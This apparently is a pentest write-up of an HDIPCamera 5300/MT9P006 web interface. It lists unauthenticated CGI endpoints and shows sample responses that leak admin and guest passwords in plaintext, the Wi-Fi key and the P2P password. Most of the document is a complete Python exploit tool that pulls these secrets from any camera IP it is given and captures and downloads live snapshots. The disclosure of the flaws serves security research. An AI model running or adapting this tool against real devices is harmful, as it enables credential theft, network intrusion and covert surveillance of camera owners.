I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
Just by examining the source I found a few unprotected CGI requests.
Several important CGI requests can be used without any authorisation, so anyone who can reach the camera's web interface can call them.
First, getting some basic info:
var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx";
var model="RT_IPC"; var hardVersion="5300-mt9p006";
var softVersion="V2.3.5.2505-S50-SMA-B20151204B";
var ipcname="IPCAM";
var startdate="2016-8-30 21:56:44";
var runtimes="0 day, 1:58";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="Dec 4 2015 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";
P2P info
var p2p_enable = "1";
var p2p_id = "PPIV-xxxxx-WZDZZ";
var p2p_pwd = "xxx";
Wifi info
var wifissid = "xxx";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="xxxxxxxxxxxxxxxx";
var wifienable="0";
var wifimac="xx:xx:xx:xx:xx:xx";
var wifienable="0";
var linkstatus="0";
var linkssid="";
var wifimode="";
rtsp info
var rtsplisnport="554";
var onvif_http_port="1018";
var rtsp_user_verify="0";
User info (including passwords, returned in plaintext)
var name0="admin";
var password0="admin";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="xxx";
var password2="xxx";
var authLevel2="3";
var name3="xxx";
var password3="xxx";
var authLevel3="3";
var name4="";
var password4="";
var authLevel4="3";
var name5="";
var password5="";
var authLevel5="3";
var name6="";
var password6="";
var authLevel6="3";
var name7="";
var password7="";
var authLevel7="3";
var name8="";
var password8="";
var authLevel8="0";
var name9="";
var password9="";
var authLevel9="0";
It’s getting even better.
A world-readable URL with all the snapshots taken.
Oh wait.. let’s make some snapshots..
outputs:
var path="/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg"
.. a freshly made snapshot.
I made a Python script that calls these CGIs and outputs all the info.
It can also make a snapshot and save it locally.
#!/bin/python
# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers
import urllib
import urllib2
import re
import argparse
# Paths of the camera's CGI endpoints. According to the write-up above, the
# web server answers these requests without any authorisation.
p2p = "/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"      # queried by --getp2p
wifi = "/cgi-bin/getwifiattr.cgi"                     # queried by --getwifi
rtsp = "/cgi-bin/hi3510/getrtsplisnport.cgi"          # queried by --getrtsp
snap = "/web/cgi-bin/hi3510/param.cgi?cmd=snap"       # queried by --snapshot
snap_dir = "/tmpfs/snap_tmpfs/"                       # not referenced by the code shown here
users = "/web/cgi-bin/hi3510/param.cgi?cmd=getuser"   # queried by --getusers
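def get_param():
    """Parse the command-line options and return the argparse namespace.

    ``--ip`` is required. The remaining options are boolean flags; ``main``
    uses each one to decide whether to query the matching CGI endpoint.
    """
    # Printed on every run. The script name now matches the one given in the
    # usage header (it previously read "mt9p600").
    print("./IPcam_5300-mt9p006.py -h for cmd options")

    # Build the parser outside the try block so the handler below can never
    # reference an unbound ``parser``.
    parser = argparse.ArgumentParser()
    parser.add_argument("--ip", dest="ip", default="", help="ip adres", required=True)
    parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot")
    parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)")
    parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)")
    parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info")
    parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)")

    try:
        return parser.parse_args()
    except IOError as msg:
        # Report an I/O failure through argparse's own error path, which
        # prints the usage text and exits.
        parser.error(str(msg))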
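def _fetch(ip, path):
    """Return the raw response body of a GET to http://<ip><path> (no credentials sent)."""
    return urllib2.urlopen(urllib2.Request("http://" + ip + path)).read()


def _save_snapshot(ip):
    """Ask the camera for a snapshot and store the image in the working directory."""
    print("make and download snapshot\n")
    url_data = _fetch(ip, snap)

    # The response carries the snapshot path (see the sample output in the
    # write-up); take everything from the first "/" to the end of that line.
    match = re.search(r"/(.*)", url_data)
    if match is None:
        # An unexpected response used to end in AttributeError on None.
        print("No snapshot path found in response: %r" % url_data)
        return
    # Remove the last two characters (the closing quote and what follows it).
    snapfile_path = match.group(0)[:-2]

    # The path is supplied by the device and is therefore untrusted input.
    # Accept only a bare file name without path separators, so the response
    # cannot make the local write land outside the working directory.
    name_match = re.search(r"IMG_[^/\\]*\.jpg", snapfile_path)
    if name_match is None:
        print("Unexpected snapshot path: %r" % snapfile_path)
        return
    snap_filename = name_match.group(0)

    print("Snap file url: %s" % snapfile_path)
    print("Save output to: %s " % snap_filename)

    # Download first, then open the file, so a failed request leaves no
    # empty file behind; ``with`` closes the handle even if the write fails.
    image = _fetch(ip, snapfile_path)
    with open(snap_filename, "wb") as f:
        f.write(image)


def main():
    """Query the CGI endpoints selected on the command line and print the results.

    Every request is a plain HTTP GET to the address given with ``--ip``.
    The raw responses are printed unmodified; as the sample output in the
    write-up shows, they contain plaintext passwords and the Wi-Fi key.
    """
    params = get_param()

    if params.snapshot:
        _save_snapshot(params.ip)

    # (selected?, heading, endpoint) in the same order as before.
    queries = (
        (params.getp2p, "Get p2p info", p2p),
        (params.getwifi, "Get wifi info", wifi),
        (params.getrtsp, "Get rtsp info", rtsp),
        (params.getusers, "Get users info", users),
    )
    for selected, heading, path in queries:
        if selected:
            print(heading)
            print(_fetch(params.ip, path))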
# Run the tool only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()